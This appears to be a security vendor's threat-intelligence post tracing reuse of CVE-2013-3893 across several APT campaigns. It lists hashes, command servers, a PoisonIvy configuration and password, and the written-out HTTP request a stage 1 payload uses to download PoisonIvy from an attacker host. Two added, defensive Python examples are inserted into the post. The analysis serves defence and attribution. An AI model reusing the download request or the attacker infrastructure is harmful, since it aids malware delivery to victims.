
Hand Me Downs: Exploit and Infrastructure Reuse Among APT Campaigns

Since we first reported on Operation DeputyDog, at least three other Advanced Persistent Threat (APT) campaigns known as Web2Crew, Taidoor, and th3bug have made use of the same exploit to deliver their own payloads to their own targets. It is not uncommon for APT groups to hand off exploits to others who are lower on the zero-day food chain – especially after the exploit becomes publicly available. Thus, while the exploit may be the same, the APT groups using it are not otherwise related.

In addition, APT campaigns may reuse existing infrastructure for new attacks. There have been reports that the use of CVE-2013-3893 may have begun in July; however, this determination appears to be based solely on the fact that the CnC infrastructure used in DeputyDog had been previously used by the attackers. We have found no indication that the attackers used CVE-2013-3893 prior to August 23, 2013.

Exploit Reuse

Since the use of CVE-2013-3893 in Operation DeputyDog (which we can confirm occurred by at least August 23, 2013), the same exploit has been used by different threat actors.

Web2Crew

On September 25, 2013, an actor we call Web2Crew utilized CVE-2013-3893 to drop PoisonIvy (not DeputyDog malware). The exploit was hosted on a server in Taiwan (220.229.238.123) and dropped a PoisonIvy payload (38db830da02df9cf1e467be0d5d9216b) hosted on the same server. In our recent paper, we document how to extract intelligence from Poison Ivy that can be used to cluster activity.

The Poison Ivy binary used in this attack was configured with the following properties:

ID: gua925
Group: gua925
DNS/Port: Direct: login.momoshop.org:443, Direct: 210.17.236.29:443,
Proxy DNS/Port:
Proxy Hijack: No
ActiveX Startup Key:
HKLM Startup Entry:
File Name:
Install Path: C:\Documents and Settings\Administrator\Desktop\runrun.exe
Keylog Path: C:\Documents and Settings\Administrator\Desktop\runrun
Inject: No
Process Mutex: ;A>6gi3lW
Key Logger Mutex:
ActiveX Startup: No
HKLM Startup: No
Copy To: No
Melt: No
Persistence: No
Keylogger: No
Password: LostC0ntrol2013~2014

This configuration matches other Web2Crew samples, particularly the ‘gua25’ ID. Some previous Web2Crew Poison Ivy samples have been configured with similar IDs, including:

920GUA
GUA4.11
GUA
GUA3.7
GUA613

Additionally, the IP address 210.17.236.29 was used to host the command and control server in this attack. A number of known Web2Crew domains previously resolved to this same IP address between August 15 and August 29.

DATE DOMAIN
2013-08-15 flash.wordpreass.net
2013-08-15 search.blogspoct.us
2013-08-15 account.twiitter.us
2013-08-15 search.twiitter.biz
2013-08-15 video.twiitter.biz
2013-08-15 domain.blogspoct.us
2013-08-15 search.wikiipedia.us
2013-08-15 search.youetube.us
2013-08-16 account.twiitter.us
2013-08-16 video.twiitter.biz
2013-08-16 domain.blogspoct.us
2013-08-16 search.blogspoct.us
2013-08-16 search.twiitter.biz
2013-08-21 search.youetube.us
2013-08-29 login.twiitter.us
2013-08-29 account.youetube.us
2013-08-29 login.twiitter.us
2013-08-29 account.youetube.us

We observed the Web2Crew actor targeting a financial institution in this attack as well as in previous attacks.

Taidoor

The same exploit (CVE-2013-3893) has also been used by another, separate APT campaign. By at least September 26, 2013, a compromised Taiwanese Government website was used to host the same exploit; however, the payload in this case was Taidoor (not DeputyDog malware). The decoded payload has an MD5 of 666603bd2073396b7545d8166d862396. The CnC servers are msdn.techsofts.com and 203.114.64.202.

We found another instance of CVE-2013-3893 hosted at www.atmovies[.]com[.]tw/home/temp1.html. This dropped another Taidoor binary with the MD5 of 1b03e3de1ef3e7135fbf9d5ce7e7ccf6. This Taidoor sample connected to a command and control server at 121.254.176.151. We found this sample targeting the same financial services firm targeted by the Web2Crew actor discussed above.

Both of these samples were the newer versions of Taidoor that we previously described here.

Th3Bug

The actor we refer to as ‘th3bug’ also used CVE-2013-3893 in multiple attacks. Beginning on September 27, compromised websites hosting the Internet Explorer zero-day redirected victims to download a stage one payload (496171867521908540a26dc81b969266) from www.jessearch[.]com/dev/js/27.exe. This payload was XOR’ed with a single-byte key of 0x95.

The stage 1 payload then downloaded a PoisonIvy payload (not DeputyDog malware) via the following request:

GET /dev/js/heap.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: www.jessearch.com
Cache-Control: no-cache

The PoisonIvy payload then connected to a command and control server at mm.tc.epac.to.

The deobfuscated stage 1 payload has an MD5 of 4017d0baa83c63ceff87cf634890a33f and was compiled on September 27, 2013. This may indicate that the th3bug actor also customized the IE zero-day exploit code on September 27, 2013 – well after the actors responsible for the DeputyDog malware weaponized the same exploit.
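The stage 1 unpacking described above (single-byte XOR with key 0x95, then an MD5 check of the decoded file) is illustrated by the following added Python example, which is not code from the original post. The input blob is constructed, not the real 27.exe, and the key-recovery step (trying all 256 keys against the MZ/PE signatures) goes beyond the post, which states the key outright.

```python
import hashlib
from typing import Optional

def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)

def recover_key(data: bytes) -> Optional[int]:
    """Known-plaintext recovery of a single-byte XOR key for a PE file:
    the decoded file must start with 'MZ' and carry 'PE\\0\\0' at the
    offset stored in e_lfanew (bytes 0x3c..0x3f of the DOS header)."""
    if len(data) < 0x40:
        return None
    for key in range(256):
        dos = xor_single_byte(data[:0x40], key)
        if dos[:2] != b"MZ":
            continue
        e_lfanew = int.from_bytes(dos[0x3c:0x40], "little")
        if e_lfanew + 4 <= len(data) and \
                xor_single_byte(data[e_lfanew:e_lfanew + 4], key) == b"PE\x00\x00":
            return key
    return None

def decode_and_check(data: bytes, expected_md5: str) -> dict:
    """Recover the key, decode, and compare the MD5 of the decoded file with
    the hash the analyst expects (the post gives the decoded stage 1 MD5)."""
    key = recover_key(data)
    if key is None:
        return {"key": None, "md5": None, "verified": False}
    decoded = xor_single_byte(data, key)
    digest = hashlib.md5(decoded).hexdigest()
    return {"key": key, "md5": digest, "verified": digest == expected_md5.lower()}

# Constructed stand-in for the downloaded stage 1 blob (not the real 27.exe):
# a minimal DOS header pointing at a PE signature, XOR'ed with 0x95 as in the post.
_header = bytearray(0x40)
_header[0:2] = b"MZ"
_header[0x3c:0x40] = (0x40).to_bytes(4, "little")
PLAINTEXT = bytes(_header) + b"PE\x00\x00" + b"constructed payload body"
ENCODED = xor_single_byte(PLAINTEXT, 0x95)
EXPECTED_MD5 = hashlib.md5(PLAINTEXT).hexdigest()  # constructed, not the post's hash

if __name__ == "__main__":
    print(decode_and_check(ENCODED, EXPECTED_MD5))
```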

Infrastructure Reuse

APT groups also reuse CnC infrastructure. It is not uncommon to see a payload call back to the same CnC even though it has been distributed via different means. For example, although the first reported use of CVE-2013-3893 in Operation DeputyDog was August 23, 2013, the CnC infrastructure had been used in earlier campaigns.

Specifically, one of the reported DeputyDog command and control servers, located at 180.150.228.102, had been used in a previous attack in July 2013. During this previous attack, likely executed by the same actor responsible for the DeputyDog campaign, the 180.150.228.102 IP hosted a PoisonIvy control server and was used to target a gaming company as well as a high-tech manufacturing company. There is no evidence to suggest that this July attack using Poison Ivy leveraged the same CVE-2013-3893 exploit.

We also observed usage of Trojan.APT.DeputyDog malware as early as March 26, 2013. In this attack, a Trojan.APT.DeputyDog binary (b1634ce7e8928dfdc3b3ada3ab828e84) was deployed against targets in both the high-technology manufacturing and finance verticals. This DeputyDog binary called back to a command and control server at www.jusched.net. There is also no evidence in this case to suggest that this attack used the CVE-2013-3893 exploit.

This malware family and the CnC infrastructure are part of an ongoing campaign. Therefore, the fact that this infrastructure was active prior to the first reported use of CVE-2013-3893 does not necessarily indicate that this particular exploit was previously used. The actor responsible for the DeputyDog campaign employs multiple malware tools and utilizes a diverse command and control infrastructure.

Conclusion

The activity associated with specific APT campaigns can be clustered and tracked by unique indicators. There are a variety of different campaigns that sometimes make use of the same malware (or sometimes widely available malware such as PoisonIvy) and the same exploits. It is not uncommon for zero-day exploits to be handed down to additional APT campaigns after they have already been used.

  • The first observed usage of CVE-2013-3893, in Operation DeputyDog, remains August 23, 2013. However, the C2 infrastructure had been used in previous attacks in July 2013.
  • CVE-2013-3893 has subsequently been used by at least three other APT campaigns: Taidoor, th3bug, and Web2Crew. However, other than the common use of the same exploit, these campaigns are otherwise unrelated.
  • We expect that CVE-2013-3893 will continue to be handed down to additional APT campaigns and may eventually find its way into the cyber-crime underground.
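The clustering argument of the conclusion, that shared infrastructure and custom malware families link activity while a handed-down exploit or a commodity RAT such as PoisonIvy does not, can be made concrete with the following added Python example, which is not code from the original post. It uses the hashes, CnC hosts and passive-DNS rows quoted above (a subset of the table) and a union-find over indicator nodes; the division into "weak" and "strong" pivots is this example's assumption, not a rule the post states.

```python
from collections import defaultdict

# Observations quoted in the post: (sample_md5, attribute_kind, value).
OBSERVATIONS = [
    ("38db830da02df9cf1e467be0d5d9216b", "c2", "login.momoshop.org"),   # Web2Crew
    ("38db830da02df9cf1e467be0d5d9216b", "c2", "210.17.236.29"),
    ("38db830da02df9cf1e467be0d5d9216b", "family", "PoisonIvy"),
    ("38db830da02df9cf1e467be0d5d9216b", "exploit", "CVE-2013-3893"),
    ("666603bd2073396b7545d8166d862396", "c2", "msdn.techsofts.com"),   # Taidoor
    ("666603bd2073396b7545d8166d862396", "c2", "203.114.64.202"),
    ("666603bd2073396b7545d8166d862396", "family", "Taidoor"),
    ("666603bd2073396b7545d8166d862396", "exploit", "CVE-2013-3893"),
    ("1b03e3de1ef3e7135fbf9d5ce7e7ccf6", "c2", "121.254.176.151"),      # Taidoor
    ("1b03e3de1ef3e7135fbf9d5ce7e7ccf6", "family", "Taidoor"),
    ("1b03e3de1ef3e7135fbf9d5ce7e7ccf6", "exploit", "CVE-2013-3893"),
    ("496171867521908540a26dc81b969266", "c2", "www.jessearch.com"),    # th3bug
    ("496171867521908540a26dc81b969266", "exploit", "CVE-2013-3893"),
    ("b1634ce7e8928dfdc3b3ada3ab828e84", "c2", "www.jusched.net"),      # DeputyDog
    ("b1634ce7e8928dfdc3b3ada3ab828e84", "family", "DeputyDog"),
]
# Two rows from the post's passive-DNS table: Web2Crew domains on the same C2 IP.
PDNS = [("flash.wordpreass.net", "210.17.236.29"), ("account.twiitter.us", "210.17.236.29")]

# Assumed weak pivots: a handed-down exploit and a commodity RAT family are shared
# by unrelated campaigns, so they must not merge clusters on their own.
WEAK = {("exploit", "CVE-2013-3893"), ("family", "PoisonIvy")}

def cluster(observations, pdns, pivot_on_weak=False):
    """Union-find over samples and indicator nodes; returns sorted sample groups."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    for sample, kind, value in observations:
        if (kind, value) in WEAK and not pivot_on_weak:
            find(sample)                    # register the sample, but do not link
            continue
        union(sample, f"{kind}:{value}")
    for domain, ip in pdns:                 # domain and IP are the same infrastructure
        union(f"c2:{domain}", f"c2:{ip}")
    groups = defaultdict(set)
    for sample, _, _ in observations:
        groups[find(sample)].add(sample)
    return sorted(sorted(g) for g in groups.values())
```

With the weak pivots ignored the five samples fall into four clusters (the two Taidoor samples join through their custom family); pivoting on the shared exploit collapses Web2Crew, Taidoor and th3bug into one cluster, which is exactly the false link the post warns against.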